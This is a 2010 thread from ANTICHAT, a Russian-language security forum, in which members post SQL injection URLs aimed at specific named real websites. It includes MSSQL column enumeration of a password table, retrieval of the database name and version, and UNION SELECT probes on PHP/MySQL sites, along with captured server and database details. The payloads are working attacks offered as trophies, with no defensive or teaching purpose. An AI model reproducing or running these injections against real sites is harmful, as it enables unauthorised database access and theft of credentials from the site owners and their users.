HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.02.2010, 20:21
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

mssql
перебирать впадляк но понятно что можно какой то софт взять но сам пробывал ...
Цитата:
http://www.iea.org/index_info.asp?id=854+or+1=(SELECT+TOP+1+COLUMN_NA ME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAM E='PASSWORD_T'+and+column_name+not+in+('ID'))--
БД:dbo,guest,INFORMATION_SCHEMA,sys,Ian,iea_read er,iea_data,Writer,Reader,db_owner...
Таблица PASSWORD_T:
'A','ACCESS_LEVEL','ADDRESS' ,'AFRICA','AIM' ,'ALUMNI','ANCHOR_NAME' ,'ARCHIVE_START' ,archiveid','ARRIVAL_DATE' ...
имя БД :
Цитата:
http://www.iea.org index_info.asp?id=854+or+1=(select+db_name())--+
версия:
Цитата:
http://www.iea.org/index_info.asp?id=854+or+1=@@version--+
Кстати здесь идеальная ошибка как писал забаненый cash --> Unclosed quotation mark after the character string

Последний раз редактировалось Strilo4ka; 23.02.2010 в 20:31..
 
Ответить с цитированием

  #2  
Старый 26.03.2010, 22:55
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от KENT1994  
PHP код:
http://knockonmydoor.com/wholesale/newsletter.php?id=1 
сайт мего крутой корпорации
целый день убил ради сс и х*й

Host IP: 66.117.14.58
Web Server: Apache
Powered-by: PHP/5.2.13
DB Server: MySQL unknown ver
Current DB: knocko7_newe

http://knockonmydoor.com/wholesale/newsletter.php?id=1+and+1=0+union+select+1,2,3,4,5 ,6,7,8--

 
Ответить с цитированием

  #3  
Старый 20.04.2010, 21:40
street16
Познающий
Регистрация: 18.09.2006
Сообщений: 43
Провел на форуме:
468989

Репутация: 3
По умолчанию

Код HTML:
http://www.santech.ru/katalog/cards.php3?gid=-2%20uni on%20select%201,ve rsion()/*
4.0.27-log
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.